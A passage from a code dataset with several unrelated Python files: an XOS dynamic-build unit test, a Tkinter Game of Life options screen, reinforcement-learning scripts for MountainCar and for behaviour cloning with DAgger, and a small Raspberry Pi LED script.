win=win)\n","sub_path":"CUB_200_2011.py","file_name":"CUB_200_2011.py","file_ext":"py","file_size_in_byte":7422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22052581","text":"\n# Copyright 2017-present Open Networking Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport os\nimport shutil\nimport sys\nimport tempfile\nimport unittest\nfrom mock import patch\n\nfrom xosconfig import Config\n\nclass DynamicLoadItem():\n def __init__(self, **kwargs):\n for (k,v) in kwargs.items():\n setattr(self, k, v)\n\nclass DynamicLoadRequest():\n def __init__(self, **kwargs):\n self.xprotos = []\n self.decls = []\n self.attics = []\n for (k,v) in kwargs.items():\n setattr(self, k, v)\n\nclass DynamicUnloadRequest():\n def __init__(self, **kwargs):\n for (k,v) in kwargs.items():\n setattr(self, k, v)\n\nclass TestDynamicBuild(unittest.TestCase):\n def setUp(self):\n global dynamicbuild\n\n config = basic_conf = os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + \"/test_config.yaml\")\n Config.clear() # in case left unclean by a previous test case\n Config.init(config)\n\n import dynamicbuild\n\n self.base_dir = tempfile.mkdtemp()\n self.example_xproto = \"\"\"option app_label = \"exampleservice\";\noption name = \"exampleservice\";\n\nmessage ExampleService (Service){\n option verbose_name = \"Example Service\";\n required string service_message = 1 [help_text = \"Service Message to Display\", max_length = 254, null = False, db_index = False, blank = False];\n}\n\nmessage Color (XOSBase){\n option verbose_name = \"Color\";\n required string name = 1 [help_text = \"Name for this color\", db_index = False, max_length = 256, null = False, blank = False];\n required string html_code = 2 [help_text = \"Code for this color\", db_index = False, max_length = 256, null = False, blank = False];\n}\n\nmessage ExampleServiceInstance (TenantWithContainer){\n option verbose_name = \"Example Service Instance\";\n required string tenant_message = 1 [help_text = \"Tenant Message to Display\", max_length = 254, null = False, db_index = False, blank = False];\n optional manytoone foreground_color->Color:serviceinstance_foreground_colors = 3 [db_index = True, null = True, blank = True];\n optional manytoone background_color->Color:serviceinstance_background_colors = 3 [db_index = True, null = True, blank = True];\n}\n\nmessage EmbeddedImage (XOSBase){\n option verbose_name = \"Embedded Image\";\n required string name = 1 [help_text = \"Name for this image\", db_index = False, max_length = 256, null = False, blank = False];\n required string url = 2 [help_text = \"URL for this image\", db_index = False, max_length = 256, null = False, blank = False];\n optional manytoone serviceinstance->ExampleServiceInstance:embedded_images = 3 [db_index = True, null = True, blank = True];\n}\n \"\"\"\n\n self.example_xproto_item = DynamicLoadItem(filename = \"exampleservice.xproto\",\n contents = self.example_xproto)\n\n self.example_request = DynamicLoadRequest(name = \"exampleservice\",\n version = \"1\",\n xprotos = [self.example_xproto_item])\n\n self.example_unload_request = DynamicUnloadRequest(name = \"exampleservice\",\n version = \"1\")\n\n self.builder = dynamicbuild.DynamicBuilder(base_dir = self.base_dir)\n\n def tearDown(self):\n if os.path.abspath(self.base_dir).startswith(\"/tmp\"): # be paranoid about recursive deletes\n shutil.rmtree(self.base_dir)\n\n def test_pre_validate_file(self):\n self.builder.pre_validate_file(self.example_xproto_item)\n\n def test_pre_validate_models(self):\n self.builder.pre_validate_models(self.example_request)\n\n def test_generate_request_hash(self):\n hash = self.builder.generate_request_hash(self.example_request, state=\"load\")\n self.assertEqual(hash, \"162de5012a8399883344085cbc232a2e627c5091\")\n\n def test_handle_loadmodels_request(self):\n with patch.object(dynamicbuild.DynamicBuilder, \"save_models\", wraps=self.builder.save_models) as save_models, \\\n patch.object(dynamicbuild.DynamicBuilder, \"run_xosgenx_service\", wraps=self.builder.run_xosgenx_service) as run_xosgenx_service, \\\n patch.object(dynamicbuild.DynamicBuilder, \"remove_service\", wraps=self.builder.remove_service) as remove_service:\n result = self.builder.handle_loadmodels_request(self.example_request)\n\n save_models.assert_called()\n run_xosgenx_service.assert_called()\n remove_service.assert_not_called()\n\n self.assertEqual(result, self.builder.SOMETHING_CHANGED)\n\n self.assertTrue(os.path.exists(self.builder.manifest_dir))\n self.assertTrue(os.path.exists(os.path.join(self.builder.manifest_dir, \"exampleservice.json\")))\n\n service_dir = os.path.join(self.base_dir, \"services\", \"exampleservice\")\n\n self.assertTrue(os.path.exists(service_dir))\n self.assertTrue(os.path.exists(os.path.join(service_dir, \"__init__.py\")))\n self.assertTrue(os.path.exists(os.path.join(service_dir, \"models.py\")))\n self.assertTrue(os.path.exists(os.path.join(service_dir, \"security.py\")))\n\n manifest = json.loads(open(os.path.join(self.builder.manifest_dir, \"exampleservice.json\"), \"r\").read())\n self.assertEqual(manifest.get(\"state\"), \"load\")\n\n def test_handle_unloadmodels_request(self):\n with patch.object(dynamicbuild.DynamicBuilder, \"save_models\", wraps=self.builder.save_models) as save_models, \\\n patch.object(dynamicbuild.DynamicBuilder, \"run_xosgenx_service\", wraps=self.builder.run_xosgenx_service) as run_xosgenx_service, \\\n patch.object(dynamicbuild.DynamicBuilder, \"remove_service\", wraps=self.builder.remove_service) as remove_service:\n result = self.builder.handle_unloadmodels_request(self.example_unload_request)\n\n save_models.assert_called()\n run_xosgenx_service.assert_not_called()\n remove_service.assert_called()\n\n self.assertEqual(result, self.builder.SOMETHING_CHANGED)\n\n self.assertTrue(os.path.exists(self.builder.manifest_dir))\n self.assertTrue(os.path.exists(os.path.join(self.builder.manifest_dir, \"exampleservice.json\")))\n\n manifest = json.loads(open(os.path.join(self.builder.manifest_dir, \"exampleservice.json\"), \"r\").read())\n self.assertEqual(manifest.get(\"state\"), \"unload\")\n\n def test_handle_loadmodels_request_twice(self):\n result = self.builder.handle_loadmodels_request(self.example_request)\n self.assertEqual(result, self.builder.SOMETHING_CHANGED)\n\n result = self.builder.handle_loadmodels_request(self.example_request)\n self.assertEqual(result, self.builder.NOTHING_TO_DO)\n\n def test_save_models(self):\n manifest = self.builder.save_models(self.example_request, state=\"load\")\n\n dynamic_dir = os.path.join(self.base_dir, \"dynamic_services\", \"exampleservice\")\n service_dir = os.path.join(self.base_dir, \"services\", \"exampleservice\")\n\n self.assertEqual(manifest[\"name\"], self.example_request.name)\n self.assertEqual(manifest[\"version\"], self.example_request.version)\n self.assertEqual(manifest[\"hash\"], \"162de5012a8399883344085cbc232a2e627c5091\")\n self.assertEqual(manifest[\"dir\"], dynamic_dir)\n self.assertEqual(manifest[\"dest_dir\"], service_dir)\n self.assertEqual(len(manifest[\"xprotos\"]), 1)\n\n def test_save_models_precomputed_hash(self):\n manifest = self.builder.save_models(self.example_request, state=\"load\", hash=\"1234\")\n\n dynamic_dir = os.path.join(self.base_dir, \"dynamic_services\", \"exampleservice\")\n service_dir = os.path.join(self.base_dir, \"services\", \"exampleservice\")\n\n self.assertEqual(manifest[\"name\"], self.example_request.name)\n self.assertEqual(manifest[\"version\"], self.example_request.version)\n self.assertEqual(manifest[\"hash\"], \"1234\")\n self.assertEqual(manifest[\"dir\"], dynamic_dir)\n self.assertEqual(manifest[\"dest_dir\"], service_dir)\n self.assertEqual(len(manifest[\"xprotos\"]), 1)\n\ndef main():\n unittest.main()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"xos/coreapi/test_dynamicbuild.py","file_name":"test_dynamicbuild.py","file_ext":"py","file_size_in_byte":8789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"12716588","text":"# Basic Animation Framework\r\n\r\n#File by jcheng3\r\n#Options page or Game Of Life\r\n# Basic Animation Framework\r\n\r\n#File by jcheng3\r\n#Seed stage for 3D Game Of Life\r\n\r\nfrom Tkinter import *\r\n\r\nimport copy\r\n\r\n####################################\r\n# customize these functions\r\n####################################\r\n\r\ninSeeds = []\r\n\r\ndef init(data):\r\n data.liveOption = 2\r\n data.spawnOption = 3\r\n data.gridSize = 5\r\n data.itrDelay = 250\r\n data.box1X = 345\r\n data.box1Y = 212\r\n data.box2X = 365\r\n data.box2Y = 241\r\n data.box3X = 220\r\n data.box3Y = 265\r\n data.box4X = 335\r\n data.box4Y = 290\r\n data.boxSize = 25\r\n data.highlight = 0\r\n data.infoFont = (\"Consolas\", 10)\r\n data.titleFont = (\"Helvetica\", 20)\r\n data.fin = False\r\n data.error = False\r\n pass\r\n\r\ndef mousePressed(event, data):\r\n print(event.x, event.y)\r\n if event.x >= data.box1X and event.y >= data.box1Y and \\\r\n event.x <= data.box1X + data.boxSize and \\\r\n event.y <= data.box1Y + data.boxSize:\r\n data.highlight = 1\r\n elif event.x >= data.box2X and event.y >= data.box2Y and \\\r\n event.x <= data.box2X + data.boxSize and \\\r\n event.y <= data.box2Y + data.boxSize:\r\n data.highlight = 2\r\n elif event.x >= data.box3X and event.y >= data.box3Y and \\\r\n event.x <= data.box3X + data.boxSize and \\\r\n event.y <= data.box3Y + data.boxSize:\r\n data.highlight = 3\r\n elif event.x >= data.box4X and event.y >= data.box4Y and \\\r\n event.x <= data.box4X + data.boxSize and \\\r\n event.y <= data.box4Y + data.boxSize:\r\n data.highlight = 4\r\n else: data.highlight = 0\r\n\r\n\r\ndef keyPressed(event, data):\r\n if data.highlight == 1:\r\n if event.keysym == \"BackSpace\":\r\n data.liveOption = data.liveOption // 10\r\n else:\r\n try:\r\n data.liveOption = (data.liveOption*10) + int(event.keysym)\r\n data.error = False\r\n except:\r\n data.error = True\r\n elif data.highlight == 2:\r\n if event.keysym == \"BackSpace\":\r\n data.spawnOption = data.spawnOption // 10\r\n else:\r\n try:\r\n data.spawnOption = (data.spawnOption*10) + int(event.keysym)\r\n data.error = False\r\n except:\r\n data.error = True\r\n elif data.highlight == 3:\r\n if event.keysym == \"BackSpace\":\r\n data.gridSize = data.gridSize // 10\r\n else:\r\n try:\r\n data.gridSize = (data.gridSize*10) + int(event.keysym)\r\n data.error = False\r\n except:\r\n data.error = True\r\n elif data.highlight == 4:\r\n if event.keysym == \"BackSpace\":\r\n data.itrDelay = data.itrDelay // 10\r\n else:\r\n try:\r\n data.itrDelay = (data.itrDelay*10) + int(event.keysym)\r\n data.error = False\r\n except:\r\n data.error = True\r\n if event.keysym == \"Return\" and data.fin == False:\r\n data.fin = True\r\n if event.keysym == \"Return\" and data.fin:\r\n if len(inSeeds) == 1:\r\n import GOL_playStage3\r\n root.destroy()\r\n GOL_playStage3.runStage(inSeeds[0], data.liveOption, data.spawnOption,\r\n data.gridSize, data.itrDelay/1000.0)\r\n elif len(inSeeds) == 2:\r\n import GOL_playStageMulti3\r\n\r\n root.destroy()\r\n\r\n GOL_playStageMulti3.runStage(inSeeds[0], inSeeds[1], data.liveOption, data.spawnOption,\r\n data.gridSize, data.itrDelay/1000.0)\r\n elif event.keysym == \"BackSpace\" and data.fin:\r\n data.fin = False\r\n\r\ndef drawText(canvas, data):\r\n center = data.width/2\r\n centerLeft = data.width/8\r\n row = data.height/5\r\n rowCount = 1\r\n canvas.create_text(center, rowCount * row,\r\n text = \"Game Of Life Options:\",\r\n font = data.titleFont)\r\n rowCount += 0.5\r\n canvas.create_text(center, rowCount * row,\r\n text = \"Changing these parameters will change\\nthe behavior of the game. Experiment!\",\r\n font = data.infoFont)\r\n rowCount += 0.5\r\n canvas.create_text(center, rowCount * row,\r\n text = \"Press \\'Enter\\' to Continue\",\r\n font = data.infoFont)\r\n rowCount += 0.25\r\n canvas.create_text(centerLeft, rowCount * row,\r\n text = \"# live neighbors to survive (default 2):\",\r\n font = data.infoFont,\r\n anchor = W)\r\n rowCount += 0.25\r\n canvas.create_text(centerLeft, rowCount * row,\r\n text = \"# live neighbors to spawn cell (default 3):\",\r\n font = data.infoFont,\r\n anchor = W)\r\n rowCount += 0.25\r\n canvas.create_text(centerLeft, rowCount * row,\r\n text = \"Grid Size (default 5):\",\r\n font = data.infoFont,\r\n anchor = W)\r\n rowCount += 0.25\r\n canvas.create_text(centerLeft, rowCount * row,\r\n text = \"Time per iteration (default 250 ms):\",\r\n font = data.infoFont,\r\n anchor = W)\r\n rowCount += 0.5\r\n canvas.create_text(center, rowCount * row,\r\n text = \"(If # live neighbors != either option, cell dies)\",\r\n font = data.infoFont)\r\n rowCount += 0.5\r\n canvas.create_text(center, rowCount*row,\r\n text = \"A cool one to try is 27 and 2. \\n (27 neighbors will never happen)\")\r\n rowCount += 0.5\r\n canvas.create_text(center, rowCount*row,\r\n text = \"27/2 is called the Exploding character\")\r\n rowCount += 0.25\r\n canvas.create_text(center, rowCount*row,\r\n text = \"(http://psoup.math.wisc.edu/mcell/rullex_life.html)\")\r\n if data.error:\r\n rowCount += 0.25\r\n canvas.create_text(center, rowCount * row,\r\n text = \"PLEASE ENTER VALID INTEGER\",\r\n font = data.infoFont,\r\n anchor = S)\r\n\r\ndef drawBoxes(canvas, data):\r\n if data.highlight == 0:\r\n color1, color2, color3, color4 = 'White', 'White','White','White'\r\n elif data.highlight == 1:\r\n color1, color2, color3, color4 = 'Yellow', 'White','White','White'\r\n elif data.highlight == 2:\r\n color1, color2, color3, color4 = 'White', 'Yellow','White','White'\r\n elif data.highlight == 3:\r\n color1, color2, color3, color4 = 'White', 'White','Yellow','White'\r\n elif data.highlight == 4:\r\n color1, color2, color3, color4 = 'White', 'White','White','Yellow'\r\n\r\n canvas.create_rectangle(data.box1X, data.box1Y,\r\n data.box1X + data.boxSize,\r\n data.box1Y + data.boxSize,\r\n fill = color1)\r\n canvas.create_rectangle(data.box2X, data.box2Y,\r\n data.box2X + data.boxSize,\r\n data.box2Y + data.boxSize,\r\n fill = color2)\r\n canvas.create_rectangle(data.box3X, data.box3Y,\r\n data.box3X + data.boxSize,\r\n data.box3Y + data.boxSize,\r\n fill = color3)\r\n canvas.create_rectangle(data.box4X, data.box4Y,\r\n data.box4X + data.boxSize,\r\n data.box4Y + data.boxSize,\r\n fill = color4)\r\n canvas.create_text(data.box1X + 0.5*data.boxSize,\r\n data.box1Y + 0.5*data.boxSize,\r\n text=str(data.liveOption))\r\n canvas.create_text(data.box2X + 0.5*data.boxSize,\r\n data.box2Y + 0.5*data.boxSize,\r\n text=str(data.spawnOption))\r\n canvas.create_text(data.box3X + 0.5*data.boxSize,\r\n data.box3Y + 0.5*data.boxSize,\r\n text=str(data.gridSize))\r\n canvas.create_text(data.box4X + 0.5*data.boxSize,\r\n data.box4Y + 0.5*data.boxSize,\r\n text=str(data.itrDelay))\r\n\r\ndef redrawAll(canvas, data): #draws two 5x5 grids\r\n # draw in canvas\r\n drawText(canvas, data)\r\n drawBoxes(canvas, data)\r\n if data.fin:\r\n canvas.create_rectangle(data.width/4,data.height/3,\r\n data.width*3/4,data.height*2/3,\r\n fill = 'white')\r\n canvas.create_text(data.width/2, data.height/2,\r\n text = \"\\'Enter\\' to confirm, \\n\\'Delete\\' to abort\")\r\n pass\r\n\r\n####################################\r\n# use the run function as-is\r\n####################################\r\n\r\n\"\"\"\r\nStart of Citation...\r\nNOT ORIGINAL CODE:\r\nTaken from CMU 15112 Animation Starter Code\r\n\"\"\"\r\n\r\nroot = Tk()\r\n\r\ndef run(width=500, height=500):\r\n def redrawAllWrapper(canvas, data):\r\n canvas.delete(ALL)\r\n canvas.create_rectangle(0, 0, data.width, data.height,\r\n fill='white', width=0)\r\n redrawAll(canvas, data)\r\n canvas.update()\r\n\r\n def mousePressedWrapper(event, canvas, data):\r\n mousePressed(event, data)\r\n redrawAllWrapper(canvas, data)\r\n\r\n def keyPressedWrapper(event, canvas, data):\r\n keyPressed(event, data)\r\n redrawAllWrapper(canvas, data)\r\n\r\n # Set up data and call init\r\n class Struct(object): pass\r\n data = Struct()\r\n data.width = width\r\n data.height = height\r\n\r\n root.resizable(width=False, height=False) # prevents resizing window\r\n init(data)\r\n # create the root and the canvas\r\n canvas = Canvas(root, width=data.width, height=data.height)\r\n canvas.configure(bd=0, highlightthickness=0)\r\n canvas.pack()\r\n # set up events\r\n root.bind(\"<Button-1>\", lambda event:\r\n mousePressedWrapper(event, canvas, data))\r\n root.bind(\"<Key>\", lambda event:\r\n keyPressedWrapper(event, canvas, data))\r\n redrawAll(canvas, data)\r\n # and launch the app\r\n root.mainloop() # blocks until window is closed\r\n print(\"bye!\")\r\n\r\n\"\"\"\r\nEnd of Citation...\r\nTaken from CMU 15112 Animation Starter Code\r\n\"\"\"\r\n\r\n#run(500,500)\r\n","sub_path":"GOL_options3.py","file_name":"GOL_options3.py","file_ext":"py","file_size_in_byte":10356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"639896359","text":"import numpy as np\nimport gym\nimport random\n\nfrom collections import deque\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom random import randint\n\n\n\nmemory = deque(maxlen=2000)\n\nenv = gym.make('MountainCar-v0')\n\nmodel = Sequential()\nmodel.add(Dense(24, input_dim=2, activation='relu'))\nmodel.add(Dense(24, activation='relu'))\nmodel.add(Dense(3, activation='linear'))\nmodel.compile(loss='mse', optimizer=Adam(lr=0.001))\n\n\nmodel2 = Sequential()\nmodel2.add(Dense(24, input_dim=2, activation='relu'))\nmodel2.add(Dense(24, activation='relu'))\nmodel2.add(Dense(3, activation='linear'))\nmodel2.compile(loss='mse', optimizer=Adam(lr=0.001))\n\nfor i in range(100000) :\n state = env.reset()\n done = False\n score = 0\n while not done :\n #calc action\n if i < 1005 and 1000<i : env.render()\n if i < 2005 and 2000<i : env.render()\n if i < 3005 and 3000<i : env.render()\n if i < 4005 and 4000<i : env.render()\n if i < 5005 and 5000<i : env.render()\n if i < 6005 and 6000<i : env.render()\n if i < 7005 and 7000<i : env.render()\n if i < 8005 and 8000<i : env.render()\n if i < 9005 and 9000<i : env.render()\n if i < 10005 and 10000<i : env.render()\n if i < 11005 and 11000<i : env.render()\n if i < 12005 and 12000<i : env.render()\n if i < 13005 and 13000<i : env.render()\n if i < 14005 and 14000<i : env.render()\n if i < 15005 and 15000<i : env.render()\n #if i > 500 : env.render()\n action = 1\n AB = randint(0, 9)\n if np.random.rand() <= 0.01 : action = random.randrange(3)\n else : action = np.argmax(model.predict(np.array(state).reshape(1,2))[0])\n next_state, reward, done, _ = env.step(action)\n suret = next_state[1]\n pos = next_state[0]\n suret = (suret - (-0.07)) / (0.07- (-0.07)) - 0.5+0.1\n # pos = (pos - (-1.2)) / (0.6- (-1.2))\n\n reward = abs(suret)\n\n memory.append((state, action, next_state, reward, done))\n\n state = next_state\n score = score + reward\n print(i, ' Score', score)\n\n #Relay\n if len(memory) < 32:\n continue\n #beyinden 32 dene misal goturduk\n sample = random.sample(memory, 32)\n for state, action, next_state, reward, done in sample :\n next_state = np.array(next_state).reshape(1,2)\n state = np.array(state).reshape(1,2)\n ra = randint(0,1)\n if ra == 0 :\n #123\n if not done : target = reward + 0.95 * np.amax(model.predict(next_state)[0])\n else : target = -1\n #print(model.predict(next_state)[0]) ``\n target_f = model.predict(state)\n target_f[0][action] = target\n model.fit(state, target_f, epochs=1,verbose=0)\n else :\n if not done : target = reward + 0.95 * np.amax(model.predict(next_state)[0])\n else : target = -1\n #print(model.predict(next_state)[0]) ``\n target_f = model.predict(state)\n target_f[0][action] = target\n model.fit(state, target_f, epochs=1,verbose=0)\n #asd\n #geleceye pragnoz ver\n #target = reward + 0.95 * np.amax(model.predict(next_state)[0])\n if not done : target = reward + 0.95 * np.amax(model.predict(next_state)[0])\n else : target = -1\n #print(model.predict(next_state)[0]) ``\n target_f = model.predict(state)\n target_f[0][action] = target\n model.fit(state, target_f, epochs=1,verbose=0)\n","sub_path":"mountaincar1.py","file_name":"mountaincar1.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"597636165","text":"import tensorflow as tf\nimport numpy as np\n\nimport itertools\nimport better_exceptions\nimport gym\nfrom gym import wrappers\nfrom tqdm import tqdm\n\nimport tf_util\nimport load_policy\n\nslim = tf.contrib.slim\n\nBATCH_SIZE = 32\nLEARNING_RATE = 0.001\nBETA = 0.9\n\nclass Policy():\n\n\tdef __init__(self, env, obs_samples=None):\n\n\t\tif obs_samples is None:\n\t\t\tobs_samples = np.array([env.observation_space.sample() for _ in range(1000)])\n\n\t\tself.obs_mean = obs_samples.mean(axis=0)\n\t\tself.obs_std = obs_samples.std(axis=0)\n\n\t\tself.state = tf.placeholder(tf.float32, [None] + list(env.observation_space.shape))\n\t\tself.target_action = tf.placeholder(tf.float32, [None] + list(env.action_space.shape))\n\n\t\tnormalized = (self.state - self.obs_mean) / self.obs_std\n\n\t\tnet = slim.fully_connected(normalized, 50, \n\t\t\t\t\t\t\t\t scope='fc1', activation_fn=tf.nn.relu)\n\t\tnet = slim.fully_connected(net, 50, \n\t\t\t\t\t\t\t\t scope='fc2', activation_fn=tf.nn.relu)\n\t\tself.policy = slim.fully_connected(net, env.action_space.shape[0], \n\t\t\t\t\t\t\t\t\t\t scope='policy', activation_fn=None)\n\n\t\t# L2-loss\n\t\tself.loss = tf.reduce_mean(tf.reduce_sum((self.policy-self.target_action)**2, axis=1))\n\n\t\toptimizer = tf.train.AdamOptimizer(LEARNING_RATE, beta1=BETA)\n\n\t\tself.train_op = optimizer.minimize(self.loss)\n\n\tdef predict(self, state):\n\t\tsess = tf.get_default_session()\n\t\treturn sess.run(self.policy, feed_dict={self.state: state})\n\n\tdef update(self, state, action):\n\t\tsess = tf.get_default_session()\n\t\tloss, _ = sess.run([self.loss, self.train_op], feed_dict={self.state: state, self.target_action: action})\n\t\treturn loss\n\n\tdef test_run(self, env, max_steps):\n\t\tobservations = []\n\t\tactions = []\n\t\trewards = 0.\n\n\t\tstate = env.reset()\n\n\t\tfor step in itertools.count():\n\t\t\tobservations.append(state)\n\t\t\tactions.append(self.predict(np.expand_dims(state, axis=0))[0])\n\n\t\t\tnext_state, reward, done, _ = env.step(actions[-1])\n\n\t\t\tstate = next_state\n\t\t\trewards += reward\n\n\t\t\tif step >= max_steps or done:\n\t\t\t\tbreak\n\n\t\texperience = {'observations': np.stack(observations, axis=0),\n\t\t\t\t\t 'actions': np.squeeze(np.stack(actions, axis=0)),\n\t\t\t\t\t 'reward': rewards}\n\n\t\treturn experience\n\n\ndef gather_expert_experience(num_rollouts, \n\t\t\t\t\t\t\t env, \n\t\t\t\t\t\t\t policy_fn, \n\t\t\t\t\t\t\t max_steps):\n\n\twith tf.Session():\n\t\ttf_util.initialize()\n\n\t\treturns = []\n\t\tobservations = []\n\t\tactions = []\n\n\t\tfor i in tqdm(range(num_rollouts)):\n\t\t\tstate = env.reset()\n\t\t\tdone = False\n\t\t\trewards = 0.\n\t\t\tsteps = 0\n\n\t\t\twhile not done:\n\t\t\t\taction = policy_fn(state[None,:])\n\t\t\t\tobservations.append(state)\n\t\t\t\tactions.append(action)\n\n\t\t\t\tnext_state, reward, done, _ = env.step(action)\n\n\t\t\t\tstate = next_state\n\t\t\t\trewards += reward\n\t\t\t\tsteps += 1\n\n\t\t\t\tif steps >= max_steps:\n\t\t\t\t\tbreak\n\n\t\t\treturns.append(rewards)\n\n\t\texpert_data = {'observations': np.stack(observations, axis=0),\n\t\t\t\t\t 'actions': np.squeeze(np.stack(actions, axis=0)),\n\t\t\t\t\t 'returns': np.array(returns)}\n\n\t\treturn expert_data\n\n\ndef behavior_cloning(env_name=None,\n\t\t\t\t\t expert_policy_file=None,\n\t\t\t\t\t num_rollouts=10,\n\t\t\t\t\t max_timesteps=None,\n\t\t\t\t\t num_epochs=100,\n\t\t\t\t\t save=None):\n\t\n\ttf.reset_default_graph()\n\n\tenv = gym.make(env_name)\n\tmax_steps = max_timesteps or env.spec.timestep_limit\n\n\tprint('[BA] Loading and building expert policy')\n\texpert_policy_fn = load_policy.load_policy(expert_policy_file)\n\n\tprint('[BA] Gather experience...')\n\tdata = gather_expert_experience(num_rollouts, env, expert_policy_fn, max_steps)\n\n\tprint('[BA] Expert\\'s reward mean: {:4f}({:4f})'.format(np.mean(data['returns']), np.std(data['returns'])))\n\n\tprint('[BA] Building cloning policy')\n\tpolicy = Policy(env, data['observations'])\n\n\twith tf.Session():\n\t\ttf_util.initialize()\n\n\t\tfor epoch in tqdm(range(num_epochs)):\n\t\t\tnum_samples = data['observations'].shape[0]\n\t\t\tperm = np.random.permutation(num_samples)\n\n\t\t\tobs_samples = data['observations'][perm]\n\t\t\taction_samples = data['actions'][perm]\n\n\t\t\tloss = 0.\n\t\t\tfor k in range(0, obs_samples.shape[0], BATCH_SIZE):\n\t\t\t\tloss += policy.update(obs_samples[k:k+BATCH_SIZE], action_samples[k:k+BATCH_SIZE])\n\n\t\t\tnew_exp = policy.test_run(env, max_steps)\n\t\t\ttqdm.write('[BA] Epoch {:3d}, Loss {:4f}, Reward {:4f}'.format(epoch, loss/num_samples, new_exp['reward']))\n\n\t\tif save is not None:\n\t\t\tenv = wrappers.Monitor(env, save, force=True)\n\n\t\tresults = []\n\t\tfor _ in tqdm(range(num_rollouts)):\n\t\t\tresults.append(policy.test_run(env, max_steps)['reward'])\n\n\t\tprint('[BA] Reward mean & std of cloned policy: {:4f}({:4f})'.format(np.mean(results), np.std(results)))\n\n\treturn np.mean(data['returns']), np.std(data['returns']), np.mean(results), np.std(results)\n\n\ndef dagger(env_name=None,\n\t\t expert_policy_file=None,\n\t\t num_rollouts=10,\n\t\t max_timesteps=None,\n\t\t num_epochs=100,\n\t\t save=None):\n\t\n\ttf.reset_default_graph()\n\n\tenv = gym.make(env_name)\n\tmax_steps = max_timesteps or env.spec.timestep_limit\n\n\tprint('[DA] Loading and building expert policy')\n\texpert_policy_fn = load_policy.load_policy(expert_policy_file)\n\n\tprint('[DA] Gather experience...')\n\tdata = gather_expert_experience(num_rollouts, env, expert_policy_fn, max_steps)\n\n\tprint('[DA] Expert\\'s reward mean: {:4f}({:4f})'.format(np.mean(data['returns']), np.std(data['returns'])))\n\n\tprint('[DA] Building cloning policy')\n\tpolicy = Policy(env, data['observations'])\n\n\twith tf.Session():\n\t\ttf_util.initialize()\n\n\t\tfor epoch in tqdm(range(num_epochs)):\n\t\t\tnum_samples = data['observations'].shape[0]\n\t\t\tperm = np.random.permutation(num_samples)\n\n\t\t\tobs_samples = data['observations'][perm]\n\t\t\taction_samples = data['actions'][perm]\n\n\t\t\tloss = 0.\n\n\t\t\tfor k in range(0, obs_samples.shape[0], BATCH_SIZE):\n\t\t\t\tloss += policy.update(obs_samples[k:k+BATCH_SIZE], action_samples[k:k+BATCH_SIZE])\n\n\t\t\tnew_exp = policy.test_run(env, max_steps)\n\n\t\t\t# Data aggregation steps\n\t\t\t# Supervision signal comes from expert policy\n\t\t\tnew_exp_len = new_exp['observations'].shape[0]\n\n\t\t\texpert_expected_actions = []\n\n\t\t\tfor k in range(0, new_exp_len, BATCH_SIZE):\n\t\t\t\texpert_expected_actions.append(expert_policy_fn(new_exp['observations'][k:k+BATCH_SIZE]))\n\n\t\t\t# Added new experience into original one\n\t\t\tdata['observations'] = np.concatenate((data['observations'], new_exp['observations']), axis=0)\n\t\t\tdata['actions'] = np.concatenate([data['actions']] + expert_expected_actions, axis=0)\n\t\t\ttqdm.write('[DA] Epoch {:3d}, Loss {:4f}, Reward {:4f}'.format(epoch, loss/num_samples, new_exp['reward']))\n\n\t\tif save is not None:\n\t\t\tenv = wrappers.Monitor(env, save, force=True)\n\n\t\tresults = []\n\t\tfor _ in tqdm(range(num_rollouts)):\n\t\t\tresults.append(policy.test_run(env, max_steps)['reward'])\n\t\tprint('[DA] Reward mean & std of cloned policy with DAGGER: {:4f}({:4f})'.format(np.mean(results), np.std(results)))\n\n\treturn np.mean(data['returns']), np.std(data['returns']), np.mean(results), np.std(results)\n\n\nif __name__ == \"__main__\":\n\n import os\n env_models = [('Ant-v1','experts/Ant-v1.pkl'),\n ('HalfCheetah-v1','experts/HalfCheetah-v1.pkl'),\n ('Hopper-v1','experts/Hopper-v1.pkl'),\n ('Humanoid-v1','experts/Humanoid-v1.pkl'),\n ('Reacher-v1','experts/Reacher-v1.pkl'),\n ('Walker2d-v1','experts/Walker2d-v1.pkl'),]\n\n results = []\n\n for env, model in env_models :\n\n ex_mean, ex_std, bc_mean, bc_std = behavior_cloning(env_name=env,\n expert_policy_file=model,\n save=os.path.join(os.getcwd(), env, 'bc'))\n\n _, _, da_mean, da_std = dagger(env_name=env,\n \t\t expert_policy_file=model,\n \t num_epochs=40,\n \t save=os.path.join(os.getcwd(), env, 'da'))\n\n results.append((env, ex_mean, ex_std,\n \t\t\t bc_mean, bc_std,\n \t\t\t da_mean, da_std))\n\n for env_name, ex_mean, ex_std, bc_mean, bc_std, da_mean, da_std in results :\n print('Env: {}, Expert: {:4f}({:4f}), Behavior Cloning: {:4f}({:4f}), Dagger: {:4f}({:4f})'.format(env_name, ex_mean, ex_std, bc_mean, bc_std, da_mean, da_std))\n ","sub_path":"sp17_hw/hw1/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"27642837","text":"from gpiozero import LED,Button\nfrom signal import pause\nimport time\n\nled = LED(18)\nbutton = Button(2)\n\nbutton.when_pressed = led.on\ntime.sleep(5)\nbutton = led.off()\ntime.sleep(5)\n\npause()\n","sub_path":"LEDButton.py","file_name":"LEDButton.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"515691651","text":"import logging\nimport os\n\nfrom pywps import FORMATS, 